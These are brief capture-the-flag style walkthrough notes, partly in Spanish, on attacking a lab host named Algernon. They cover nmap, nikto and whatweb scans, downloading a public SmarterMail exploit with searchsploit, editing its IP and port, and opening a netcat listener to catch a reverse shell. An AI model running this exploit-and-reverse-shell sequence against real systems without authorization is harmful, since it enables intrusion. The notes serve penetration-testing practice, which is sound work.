nmap -A -p- -oA algernon 192.168.59.65 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA algernon 192.168.59.65

nmap -sU -O -p- -oA algernon-udp 192.168.59.65

nikto -h 192.168.59.65:80

Pasted image 20210919163231.png

Pasted image 20210919163728.png

whatweb http://192.168.59.65

whatweb http://192.168.59.65:9998

Pasted image 20210919163844.png

http://192.168.59.65

Pasted image 20210919163904.png

http://192.168.59.65:9998

Pasted image 20210919163936.png

https://www.exploit-db.com/exploits/49216

searchsploit SmarterMail

searchsploit -m 49216

Pasted image 20210919164111.png

Cambiamos las ip y el puerto en 49216.py

Pasted image 20210919165332.png

nc -lvnp 21

Pasted image 20210919170228.png

boxes

copyright©2022 Cu3rv0x all rights reserved